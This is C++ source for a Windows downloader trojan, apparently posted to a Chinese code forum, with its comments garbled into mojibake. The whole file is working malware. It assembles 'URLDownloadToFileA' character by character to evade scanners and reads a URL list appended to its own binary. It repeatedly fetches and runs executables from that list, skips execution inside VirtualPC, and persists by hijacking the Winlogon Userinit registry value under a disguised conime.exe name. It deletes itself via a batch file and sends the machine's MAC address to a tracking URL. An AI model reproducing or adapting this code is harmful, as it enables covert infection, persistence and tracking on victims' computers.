[C++] 纯文本查看 复制代码
#include <stdio.h>
#include <shlwapi.h>
#include<wininet.h>
#pragma comment(lib,"wininet.lib")
#pragma comment(lib,"shlwapi.lib")
#pragma comment(lib,"MSVCRT.lib")
#pragma comment (lib,"Urlmon.lib")
#pragma comment(linker, "/OPT:NOWIN98") //è¡ÏûÕa¼¸DDμÄ×¢êí£¬±àòë3öμÄÎļtÖ»óD2K′óD¡
#pragma comment(linker, "/align:0x200")
#pragma comment(linker, "/subsystem:windows")
#pragma comment(linker,"/ENTRY:ProcEntry /FILEALIGN:0x200 /MERGE:.data=.text /MERGE:.rdata=.text CTION:.text,EWR /IGNORE:4078")
#include <time.h>
#include <winsock.h>
#include <stdlib.h>
#include <Wininet.h>
#include<Aclapi.h>
#include <io.h>
#pragma comment(lib,"Wininet.lib")
#pragma comment(lib,"ws2_32")
DWORD(WINAPI *DOWNFILE) (LPCTSTR ,LPCTSTR, LPCTSTR ,DWORD, LPCTSTR);//¶ˉ쬼óÔØUrlmon.dllÖDμÄUrlDownloadToFileAoˉêy
HINSTANCE hurlmon;
int memfind(const char *mem, const char *str, int sizem, int sizes)
{
int da,i,j;
if (sizes == 0) da = strlen(str);
else da = sizes;
for (i = 0; i < sizem; i++)
{
for (j = 0; j < da; j ++)
if (mem[i+j] != str[j]) break;
if (j == da) return i;
}
return -1;
}
#define MAX_CONFIG_LEN 500
LPCTSTR FindConfigString( LPCTSTR lpString)//2éÕòÎļtÄ©Î2μÄÅäÖÃDÅÏ¢
{
char strFileName[MAX_PATH];
char *lpConfigString = NULL;
DWORD dwBytesRead = 0;
GetModuleFileName(0, strFileName, sizeof(strFileName));
HANDLE hFile = CreateFile(strFileName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, 0, NULL);
if (hFile == INVALID_HANDLE_VALUE)
{
return NULL;
}
SetFilePointer(hFile, -MAX_CONFIG_LEN, NULL, FILE_END);
lpConfigString = new char[MAX_CONFIG_LEN];
ReadFile(hFile, lpConfigString, MAX_CONFIG_LEN, &dwBytesRead, NULL);
CloseHandle(hFile);
int offset = memfind(lpConfigString, lpString, MAX_CONFIG_LEN, 0);
if (offset == -1)
{
delete lpConfigString;
return NULL;
}
else
{
return lpConfigString + offset;
}
}
int DownExe()
{
char strDown[19];
strDown[0] = 'U';
strDown[1] = 'R';
strDown[2] = 'L';
strDown[3] = 'D';
strDown[4] = 'o';
strDown[5] = 'w';
strDown[6] = 'n';
strDown[7] = 'l';
strDown[8] = 'o';
strDown[9] = 'a';
strDown[10] = 'd';
strDown[11] = 'T';
strDown[12] = 'o';
strDown[13] = 'F';
strDown[14] = 'i';
strDown[15] = 'l';
strDown[16] = 'e';
strDown[17] = 'A';
strDown[18] = '\0';
//MessageBox(0,strDown,"ok", 0);
char urlmon[11];
urlmon[0] = 'u';
urlmon[1] = 'r';
urlmon[2] = 'l';
urlmon[3] = 'm';
urlmon[4] = 'o';
urlmon[5] = 'n';
urlmon[6] = '.';
urlmon[7] = 'd';
urlmon[8] = 'l';
urlmon[9] = 'l';
urlmon[10] = '\0';
//MessageBox(0,urlmon,"ok", 0);
char FindStr[7];
FindStr[0] = 'O';
FindStr[1] = 'O';
FindStr[2] = 'O';
FindStr[3] = 'O';
FindStr[4] = 'O';
FindStr[5] = 'O';
FindStr[6] = '\0';
char *url = NULL;
char *DownUrl = NULL;
char *SavePath = NULL;
url = (char *)FindConfigString(FindStr);
char *pos = strchr(url, '|'); //Õa¸öoí¸Õ2ÅμÄÖ»óDò»μã2»í¬£¬¾íêÇÄü¶à¶áè¡ò»¸öêy¾Y£¬Õaὸöêy¾YÖ®¼äóá°|¡±¸ô¿a
if (pos == NULL)
return -1;
*pos = '\0';
DownUrl = url + 6;
SavePath = pos + 1;
if (DownUrl == NULL || SavePath == NULL)
return -1;
//MessageBox(0,DownUrl,"ok",0);//°Ñ·Öàë3öà′μÄὸö×Ö·û′®ÏÔê¾3öà′
//MessageBox(0,SavePath,"ok",0);
hurlmon=LoadLibrary(urlmon);
(FARPROC&)DOWNFILE= GetProcAddress(hurlmon,strDown);
HRESULT hr = DOWNFILE(NULL, DownUrl, SavePath, 0, NULL);
char strTmpPath[MAX_PATH];
char strRunPath[MAX_PATH];
GetTempPath(sizeof(strTmpPath), strTmpPath);
FILE *stream;
char buffer[200];
stream = fopen(SavePath,"r");
if (hr== S_OK)
{
while(fscanf(stream,"%s\n",buffer)==1)
{
wsprintf(strRunPath,"%s\\%d.exe",strTmpPath,GetTickCount());
DOWNFILE(0, buffer, strRunPath, 0, 0);
//MessageBox(NULL,buffer,"ìáê¾",MB_ICONINFORMATION);
WinExec(strRunPath, SW_SHOW);
}
fclose(stream);
}
DeleteFile(SavePath);
return 0;
}
bool IsVirtualPC()//·′nod322éé±
{
__try
{
__asm
{
mov eax, 1
_emit 0x0F
_emit 0x3F
_emit 0x07
_emit 0x0B
_emit 0xC7
_emit 0x45
_emit 0xFC
_emit 0xFF
_emit 0xFF
_emit 0xFF
_emit 0xFF
}
}
__except(1)
{
return FALSE;
}
return TRUE;
}
void WriteReg()//D′×¢2á±írun
{
char WinPath[MAX_PATH];
char OldPath[MAX_PATH];
char MyPath[MAX_PATH];
char RegStr[MAX_PATH];
GetWindowsDirectory(WinPath,sizeof(WinPath));//μÃμ½windowsĿ¼
wsprintf(OldPath,"%s%s",WinPath,"\\system32\\userinit.exe");
wsprintf(MyPath,"%s%s",WinPath,"\\Tasks\\conime.exe");
wsprintf(RegStr,"%s%s%s",OldPath,",",MyPath);
char regname[]="Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon";
HKEY hkResult;
int ret=RegOpenKey(HKEY_LOCAL_MACHINE,regname,&hkResult); //′ò¿a1ؼü×Ö
ret=RegSetValueEx(hkResult,"Userinit",0,REG_SZ,(unsigned char *)RegStr,100); /*éèÖüüÖμ*/
RegCloseKey(hkResult);
}
//×Ôé¾3y
void uninstall(void)
{
int i;
HANDLE hFile;
DWORD dwWritten;
char selfpathaaa[MAX_PATH]={0};
char command[2048]={0};
char name[]="afc9fe2f418b00a0.bat";
GetModuleFileName(NULL,selfpathaaa,MAX_PATH);
lstrcpy(command,"@echo off\n\r");
for (i=0;i<10;i++)
lstrcat(command,"@echo asdfhdsafjkahlsdjfhlk>>3596799a1543bc9f.aqq\n\r");
lstrcat(command,"@del 3596799a1543bc9f.aqq\n\r");
lstrcat(command,"@del \"");
lstrcat(command,selfpathaaa);
lstrcat(command,"\"\n\r");
lstrcat(command,"@del ");
lstrcat(command,name);
lstrcat(command,"\n\r@exit");
hFile=CreateFile(name,GENERIC_WRITE,0,NULL,CREATE_ALWAYS,0,NULL);
WriteFile(hFile,(LPCVOID)command,sizeof(command),&dwWritten,NULL);
CloseHandle(hFile);
WinExec(name,SW_HIDE);
ExitProcess(NULL);
}
char *ltrim_VVVVVV(char *pstr)
{
while(*pstr++=='V');
return --pstr;
}
char *ltrim_CCCCCC(char *pstr)
{
while(*pstr++=='C');
return --pstr;
}
#include "Rpcdce.h"
#pragma comment(lib,"Rpcrt4.lib")
void MyCount()
{
char szURL[MAX_PATH];
char *MyUrl = NULL;
char *CountUrl = NULL;
MyUrl = (char *)FindConfigString("CCCCCC");
CountUrl = ltrim_CCCCCC(MyUrl);
char *pVersionStr = NULL;
char *pVersion = NULL;
pVersionStr = (char *)FindConfigString("VVVVVV");
pVersion = ltrim_VVVVVV(pVersionStr);
long rt;
UUID ui;
char mac[6][10]={0};
char temp[MAX_PATH];
char Mac[MAX_PATH];
rt = UuidCreateSequential(&ui);
if (rt == RPC_S_OK)
{
_itoa(ui.Data4[2],mac[0],16);
_itoa(ui.Data4[3],mac[1],16);
_itoa(ui.Data4[4],mac[2],16);
_itoa(ui.Data4[5],mac[3],16);
_itoa(ui.Data4[6],mac[4],16);
_itoa(ui.Data4[7],mac[5],16);
}
for(int n=0;n<6;n++)
{
if (strlen(mac[n]) == 1)
{
wsprintf(temp, "0%s", mac[n]);
strcpy(mac[n],temp);
}
}
wsprintf(Mac, "%s-%s-%s-%s-%s-%s",mac[0],mac[1],mac[2],mac[3],mac[4],mac[5]);
sprintf(szURL,"%s?mac=%s&ver=%s",CountUrl,Mac,pVersion); //óÃ諾ÖËæ»ú′®×öΨò»±ê¼Ç
//MessageBox(NULL,szURL,"ìáê¾",MB_ICONINFORMATION);
HINTERNET hNet = ::InternetOpen("Google page", //μ±HTTPD-òéê1óÃê±£¬Õa¸ö2ÎêyËæòa¸3Öμ
PRE_CONFIG_INTERNET_ACCESS, //·ÃÎêààDíÖ¸ê¾Win32íøÂçoˉêyê1óÃμǼÇDÅϢ襷¢ÏÖò»¸ö·tÎñÆ÷¡£
NULL,
INTERNET_INVALID_PORT_NUMBER, //ê1óÃINTERNET_INVALID_PORT_NUMBERÏàμ±óúìá1©è′ê¡μĶ˿úêy¡£
0 //±êÖ¾è¥Ö¸ê¾ê1ó÷μ»Ø¾ä¾ä±úμĽ«à′μÄInternetoˉêy½«"2»"Îa»Øμ÷oˉêy·¢Ëí×′ì¬DÅÏ¢
) ;
HINTERNET hUrlFile = ::InternetOpenUrl(hNet, //′óInternetOpen·μ»Øμľä±ú
szURL, //Dèòa′ò¿aμÄURL
NULL, //óÃà′Ïò·tÎñÆ÷′«Ëí¶îíaμÄDÅÏ¢,ò»°ãÎaNULL
0, //óÃà′Ïò·tÎñÆ÷′«Ëí¶îíaμÄDÅÏ¢,ò»°ãÎa 0
INTERNET_FLAG_RELOAD, //InternetOpenUrlDDÎaμıêÖ¾
0) ; //DÅÏ¢½«2»»á±»Ëíμ½×′쬻Øμ÷oˉêy
char buffer[1024] ;
DWORD dwBytesRead = 0;
BOOL bRead = ::InternetReadFile(hUrlFile, //InternetOpenUrl·μ»Øμľä±ú
buffer, //±£áôêy¾YμÄ»o3åÇø
sizeof(buffer),
&dwBytesRead); //Ö¸Ïò°üo¬¶áèë»o3åÇø×Ö½úêyμıäá¿μÄÖ¸Õë;
//èç1û·μ»ØÖμêÇTRUE£¬¶øÇòÕaàïÖ¸Ïò0£¬ÔòÎļtòѾ-¶áμ½áËÎļtμÄÄ©Î2¡£
::InternetCloseHandle(hUrlFile) ;
::InternetCloseHandle(hNet) ;
}
int ProcEntry()
{
if(IsVirtualPC())
{
return 0;
}
char Mulu[MAX_PATH];
char WinPath[MAX_PATH];
char MyPath[MAX_PATH];
GetModuleFileName(0,Mulu,sizeof(Mulu));
PathRemoveFileSpec(Mulu);
GetWindowsDirectory(WinPath,sizeof(WinPath));//μÃμ½windowsĿ¼
strcat(WinPath,"\\Tasks");
GetModuleFileName(0,MyPath,sizeof(MyPath));
//MessageBox(NULL,Mulu,"ìáê¾",MB_ICONINFORMATION);
//MessageBox(NULL,WinPath,"ìáê¾",MB_ICONINFORMATION);
if (stricmp(Mulu,WinPath) != 0) //èç1û×Ô¼o2»ÔúwindowsĿ¼¾í¸′ÖÆμ½ÄÇàïè¥
{
strcat(WinPath,"\\conime.exe");
DeleteFile(WinPath);
WriteReg();//D′×¢2á±íòÔ′ïμ½×ÔÆô¶ˉμÄÄ¿μÄ
CopyFile(MyPath,WinPath,false);
Sleep(500);
WinExec(WinPath,SW_HIDE);
Sleep(1000);
uninstall();
ExitProcess(0);
}
int i = 0;
while(i < 6) //¼ä¸ô20·ÖÖóÏÂÔØ
{
DownExe();
MyCount(); //í3¼Æ
Sleep(20 * 60 * 1000);
i++;
}
ExitProcess(0);
return 0;
}